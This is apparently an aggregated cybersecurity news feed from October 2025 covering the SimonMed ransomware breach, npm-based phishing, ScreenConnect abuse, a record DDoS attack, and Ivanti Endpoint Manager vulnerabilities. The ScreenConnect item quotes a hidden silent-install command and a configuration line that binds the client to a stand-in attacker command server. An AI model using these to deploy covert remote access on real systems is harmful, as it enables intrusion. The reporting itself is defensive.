• Before an attacker ever sends a payload, they’ve already done the work of understanding how your environment is built. They look at your login flows, your JavaScript files, your error messages, your API documentation, your GitHub repos. These are all clues that help them understand how your systems behave. AI is significantly accelerating reconnaissance and enabling attackers to map your

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In October 2025, security researchers uncovered an unprecedented phishing campaign that weaponizes the npm ecosystem—not by infecting developers during package installation, but by abusing the unpkg.com CDN as a disposable hosting platform for malicious JavaScript. By seeding over 175 throwaway npm packages, attackers have turned a trusted open source delivery network into a large-scale phishing […]

    The post Malicious NPM Packages Used in Sophisticated Developer Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SimonMed Imaging, a leading U.S. provider of outpatient medical imaging services, has disclosed a major cybersecurity incident that compromised the personal and health data of approximately 1.2 million patients.

    The breach, which occurred earlier this year, was linked to a ransomware attack claimed by the notorious Medusa group, highlighting ongoing vulnerabilities in the healthcare sector.

    Notifications to affected individuals began on October 10, 2025, following a prolonged investigation to assess the full scope of the damage.​

    The incident unfolded in late January 2025 when SimonMed received an alert from one of its third-party vendors about a potential security compromise on January 27.

    The company promptly initiated a system review and detected suspicious network activity the next day, confirming unauthorized access had begun on January 21 and lasted until February 5.

    SimonMed Data Breach

    Forensic experts determined that cybercriminals had infiltrated the network, exfiltrating files containing sensitive patient information over this two-week period.

    SimonMed, which operates more than 170 imaging centers across 11 states and generates over $500 million in annual revenue, specializes in services like MRI, CT scans, ultrasounds, and mammograms.

    The attackers, identified as the Medusa ransomware operation, stole around 212 gigabytes of data and demanded a $1 million ransom, posting samples on their dark web leak site to pressure the company.

    While SimonMed has not confirmed paying the ransom or details on the initial entry point, possibly through the vendor, the breach underscores the risks of supply chain attacks in healthcare.

    In response, SimonMed acted swiftly to contain the threat by resetting passwords, bolstering multifactor authentication, deploying endpoint detection and response tools, severing direct vendor access to internal systems, and restricting network traffic to whitelisted sources only.

    The company also engaged law enforcement and privacy specialists, reporting the matter to relevant authorities, including the U.S. Department of Health and Human Services’ Office for Civil Rights.

    The exposed information varied among individuals but included highly sensitive details such as full names, addresses, dates of birth, service dates, provider names, medical records and patient numbers, diagnoses, treatment histories, prescribed medications, health insurance details, and even driver’s license numbers.

    This breadth of data makes victims prime targets for identity theft, medical fraud, and phishing schemes, as health records fetch high prices on underground markets.

    To date, SimonMed reports no confirmed instances of data misuse for fraud or identity theft stemming from the breach, but the delay in notifications nearly nine months after detection has drawn criticism from cybersecurity experts and patient advocates.

    The company initially filed a preliminary report to regulators, estimating 500 affected individuals as a placeholder, with the true figure of 1,275,669 emerging only after exhaustive file reviews.

    Data TypeDescriptionPotential Risk
    Personal IdentifiersNames, addresses, DOB, driver’s licensesIdentity theft, stalking
    Medical RecordsDiagnoses, treatments, medicationsMedical fraud, blackmail
    Insurance & FinancialHealth insurance info, patient numbersBilling scams, unauthorized claims

    This table summarizes the key categories of compromised data, illustrating the multifaceted threats posed to patients’ privacy and security.

    The breach has already sparked at least one class-action lawsuit against SimonMed, alleging negligence in safeguarding patient data and insufficient transparency during the response.

    Law firms are investigating claims on behalf of affected customers, potentially leading to broader litigation as more details emerge.

    To mitigate risks, SimonMed is providing complimentary 24-month memberships to Experian IdentityWorks, offering fraud detection, credit monitoring, and identity restoration services.

    Patients are urged to enroll promptly using unique activation codes included in notification letters and to remain vigilant by reviewing credit reports annually via AnnualCreditReport.com and placing fraud alerts with major bureaus like Equifax, Experian, and TransUnion.

    Experts emphasize that such incidents reflect a surge in ransomware targeting healthcare, with Medusa alone claiming over 300 victims across critical sectors this year, as warned in a March 2025 FBI advisory.

    SimonMed’s ongoing security enhancements, including advanced monitoring and vendor audits, aim to prevent recurrences, but the event serves as a stark reminder for the industry to prioritize robust defenses against evolving cyber threats.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post SimonMed Data Breach Exposes 1.2 Million Patients Sensitive Information appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Remote monitoring and management (RMM) tools have long served as indispensable assets for IT administrators, providing seamless remote control, unattended access, and scripted automation across enterprise endpoints.

    In recent months, security researchers have observed a surge in adversaries repurposing ScreenConnect—a ConnectWise RMM solution—as a clandestine backdoor for initial intrusion and ongoing control.

    Emerging from widespread phishing campaigns that prey on compromised credentials, these attacks leverage ScreenConnect’s flexible installer and invite-link mechanisms to slip past traditional defenses with minimal on-disk footprint.

    The campaign typically begins with spear-phishing emails masquerading as legitimate IT alerts, enticing recipients to download a bespoke ScreenConnect installer or click an invite link.

    Malicious email with malicious link (Source – Dark Atlas)

    Once executed, the MSI package deploys entirely in memory, sidestepping signature-based antivirus detection and dropping only a transient service binary.

    The implanted agent then registers as a Windows service, granting attackers unfettered access to file systems, process execution, and the host’s network stack.

    Within hours, threat actors have been observed pivoting laterally, escalating privileges, and exfiltrating sensitive data under the guise of routine maintenance.

    Dark Atlas analysts identified that the adversaries customize builder configurations on-the-fly, embedding unique hostnames and encrypted launch keys directly into the client’s system.config file to evade network-based indicators of compromise.

    These dynamically generated parameters are mapped in an XML section of ScreenConnect.ApplicationSettings, where malicious domains resolve to attacker-controlled infrastructure.

    This tactic not only obfuscates command-and-control channels but also ensures each deployment appears as a distinct operational instance to defenders.

    Infection Mechanism and Installer Artifacts

    The ScreenConnect installer exploits built-in RMM features to minimize detection while maintaining persistence.

    Attackers generate a custom builder from the management console, choosing an MSI or EXE packager depending on the target environment.

    When launched, the installer writes a WindowsClient executable and associated DLLs into a benign-looking directory—such as C:\ProgramData\ScreenConnectClient\—before invoking the service with an obfuscated command line.

    A typical execution snippet appears as:-

    Start-Process -FilePath "msiexec.exe" -ArgumentList "/i ScreenConnect.ClientSetup.msi /qn /norestart" -WindowStyle Hidden

    Upon installation, the agent creates a system.config XML, storing <setting name="HostToAddressMap">attacker.example.com-203.0.113.45-1631789321000</setting>, binding the client to its command server.

    Persistence is achieved through the registered Windows service named ScreenConnect ClientService, which relaunches the binary on reboot.

    AnyDesk Chat Files (Source – Dark Atlas)

    Memory-only artifacts, such as live chat transcripts and session logs, reside solely in process heaps, necessitating volatile memory capture for forensic recovery.

    By combining in-memory execution, custom-config builders, and encrypted launch keys, threat actors transform a legitimate RMM solution into a stealthy remote access Trojan, complicating detection and incident response for security operations teams.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post ScreenConnect Abused by Threat Actors to Gain Unauthorized Remote Access to Your Computer appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers have launched a sophisticated phishing campaign impersonating both OpenAI and the recently released Sora 2 AI service. By cloning legitimate-looking landing pages, these actors are duping users into submitting their login credentials, participating in faux “gift” surveys, and even falling victim to cryptocurrency scams. Security researchers note that these deceptive domains are already ensnaring […]

    The post Hackers Mimic as OpenAI and Sora Services to Steal Login Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Luxembourg, October 14th, 2025, CyberNewsWire Surge in scale and sophistication highlights rising threats to tech and digital infrastructure Gcore, the global edge AI, cloud, network, and security solutions provider, has successfully mitigated one of the largest DDoS attacks recorded to date. The large-scale, multi-regional DDoS attack reached a peak bandwidth of 6 Tbps (terabits per […]

    The post Gcore Mitigates Record-Breaking 6 Tbps DDoS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Luxembourg, Luxembourg, October 14th, 2025, CyberNewsWire

    Surge in scale and sophistication highlights rising threats to tech and digital infrastructure

    Gcore, the global edge AI, cloud, network, and security solutions provider, has successfully mitigated one of the largest DDoS attacks recorded to date.

    The large-scale, multi-regional DDoS attack reached a peak bandwidth of 6 Tbps (terabits per second) and a packet rate of 5.3 Bpps (billion packets per second).

    The attack targeted a hosting provider operating in the gaming sector, but the methodology and scale confirm a broader trend of intensifying DDoS campaigns aimed at a wide range of digital infrastructure.

    The attack was consistent with the AISURU botnet, which has been associated with several high-impact incidents in recent months worldwide.

    “This incident underscores an ongoing escalation in both the scale and sophistication of DDoS attacks,” said Andrey Slastenov, Head of Security at Gcore.“While this event was a short-burst volumetric flood, across the industry we increasingly see campaigns used to probe resilience or coincide with other vectors. Without robust, adaptive protection, organizations across tech, hosting, and enterprise sectors remain at risk.”

    Attack Highlights:

    • Peak traffic: 6 Tbps
    • Packet rate: 5.3 Bpps
    • Main protocol: UDP, typical of volumetric floods
    • Duration: 30-45 seconds
    • Geographic concentration: 51% of sources originated in Brazil and 23.7% in the US, together accounting for nearly 75% of all traffic

    This event mirrors insights from the recently published Gcore Radar report Q1-Q2 2025, which revealed that not only did the number of DDoS attacks increase by 41% in just one quarter, but attacks targeting tech companies also rose significantly, accounting for 30% of all recorded incidents.

    In the context of this attack, the multi-regional origin and volumetric scale signal a concerning evolution of botnet capabilities, exploiting unsecured infrastructure in regions with high device density and weaker security controls. AISURU’s concentration in Brazil and the US reflects this dynamic.

    Strategic Implications for Hosting and Enterprise Infrastructure

    The attack’s characteristics align with a growing tactic observed in modern DDoS campaigns: short-burst, high-intensity attacks designed not only to cause downtime but to probe infrastructure resilience.

    “For hosting providers, uptime is currency,” added Slastenov. “When a botnet can generate 6 Tbps of traffic, even a few seconds of disruption can translate to financial and reputational damage. This is why adaptive mitigation, edge-layer filtering, and Layer 7 behavioral analysis are no longer optional, they’re mission-critical.”

    Gcore’s Response and Defense Capabilities

    Gcore’s global DDoS Protection solution absorbed and neutralized the attack without service interruption, leveraging its globally distributed infrastructure across 210+ Points of Presence and a filtering capacity exceeding 200 Tbps.

    The incident highlights the need for integrated, AI-driven DDoS defense strategies capable of real-time response and deep traffic inspection—especially as attacks continue to combine volumetric and application-layer exploits.

    About Gcore

    Gcore is a global infrastructure and software provider for AI, cloud, network, and security solutions. Headquartered in Luxembourg, Gcore operates its own sovereign infrastructure across six continents, delivering ultra-low latency and compliance-ready performance for mission-critical workloads.

    Its AI-native cloud stack combines software innovation with hyperscaler-grade functionality, enabling enterprises and service providers to build, train, and scale AI everywhere, across public, private, and hybrid environments.

    By integrating AI, compute, networking, and security into a single platform, Gcore accelerates digital transformation and empowers organizations to unlock the full potential of AI-driven services. Users can learn more at gcore.com.

    PR agency contact  

    gcore@aspectusgroup.com

    Contact

    Ms.

    Kira Kurepina

    Gcore

    press@gcore.com

    The post Gcore Mitigates Record-Breaking 6 Tbps DDoS Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SimonMed Imaging has confirmed that an external hacking incident compromised the personal data of 1,275,669 patients, making it one of the largest healthcare breaches of the year. The breach, which occurred on January 21, 2025, but was not discovered until January 28, exposed names and other personal identifiers. Written notifications were sent to affected individuals […]

    The post SimonMed Data Breach Exposes Sensitive Information of 1.2 Million Patients appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a sprawling network of covert remote labor, more than 10,000 North Korean IT professionals have infiltrated global technology and freelance marketplaces by exploiting VPNs, virtual private servers (VPS), and so-called “laptop farms” to conceal their true origins. State-backed cyber units employ these operatives to generate revenue for sanctioned weapons programs and gather intelligence across […]

    The post North Korean IT Workers Use VPNs and Laptop Farms to Evade Identity Verification appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has disclosed 13 vulnerabilities in its Endpoint Manager (EPM) software, including two high-severity flaws that could enable remote code execution and privilege escalation, urging customers to apply mitigations while patches remain in development.

    The announcement comes amid growing scrutiny of enterprise management tools, as attackers increasingly target them for supply chain compromises.

    Although no exploitation in the wild has been reported, the issues highlight the risks of outdated deployments in endpoint security environments.

    Critical Vulnerabilities Exposed In Endpoint Manager

    Among the vulnerabilities, CVE-2025-9713 stands out as a high-severity path traversal issue with a CVSS score of 8.8, allowing unauthenticated remote attackers to execute arbitrary code if users interact with malicious files.

    This flaw, rooted in CWE-22, exploits weak input validation during configuration imports, potentially letting adversaries upload and run malicious payloads on the EPM Core server.

    Complementing it is CVE-2025-11622, an insecure deserialization vulnerability (CVSS 7.8, CWE-502) that permits local authenticated users to escalate privileges, granting unauthorized access to sensitive system resources.

    The remaining 11 vulnerabilities are medium-severity SQL injection flaws (each CVSS 6.5, CWE-89), such as CVE-2025-11623 and CVE-2025-62392 through CVE-2025-62384.

    CVE IDDescriptionCVSS ScoreSeverityCVSS VectorCWE
    CVE-2025-11622Insecure deserialization allowing local authenticated privilege escalation.7.8HighCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H502
    CVE-2025-9713Path traversal allowing remote unauthenticated RCE with user interaction.8.8HighCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H22
    CVE-2025-11623SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62392SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62390SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62389SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62388SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62387SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62385SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62391SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62383SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62386SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89
    CVE-2025-62384SQL injection allowing remote authenticated arbitrary data read.6.5MediumCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N89

    These allow remote authenticated attackers to extract arbitrary data from the database, including credentials or configuration details, without needing user interaction beyond initial authentication.

    Ivanti noted that all issues were responsibly reported by researcher 06fe5fd2bc53027c4a3b7e395af0b850e7b8a044 via Trend Micro’s Zero Day Initiative, underscoring the value of coordinated disclosure in bolstering defenses.

    No proof-of-concept exploits or indicators of compromise (IoCs) have been publicly released, as Ivanti confirmed no active attacks at disclosure time.

    However, the potential for data exfiltration via SQL injections could aid broader campaigns, similar to past incidents targeting management consoles like those from SolarWinds or Log4j.

    Ivanti EPM versions 2024 SU3 SR1 and earlier are affected, with the 2022 branch now end-of-life as of October 2025, leaving users without official support.

    For the high-severity CVEs, fixes are slated for EPM 2024 SU4, expected November 12, 2025. The SQL injections will follow in SU5 during Q1 2026, delayed due to the complexity of resolving them without disrupting reporting features.

    Ivanti emphasized that upgrading to the latest 2024 release already mitigates much of the risk through enhanced security controls. Customers on EOL versions face heightened exposure and should migrate promptly to avoid unpatched vulnerabilities.

    The company’s FAQ addresses concerns, noting that while patches are forthcoming, immediate mitigations can secure environments in the interim.

    Mitigations

    To counter CVE-2025-11622, Ivanti recommends firewall whitelisting to block high-range TCP ports and restricting Core server access to local EPM administrators only, aligning with established best practices.

    For the path traversal in CVE-2025-9713, users must avoid importing untrusted configuration files and thoroughly vet any necessary ones, as such actions inherently carry risks.

    The SQL injection cluster can be addressed by removing the Reporting database user, though this disables analytics features, a trade-off detailed in Ivanti’s documentation. Overall, staying on EPM 2024 SU3 SR1 or later provides layered protections, reducing exploit viability.

    Ivanti’s disclosure, despite pending patches, prioritizes transparency, allowing proactive defenses in a landscape where endpoint managers are prime targets for ransomware and APT groups. Organizations should audit their EPM setups and consult Ivanti’s Success Portal for tailored support.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Ivanti Patches 13 Vulnerabilities in Endpoint Manager Allowing Remote Code Execution appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶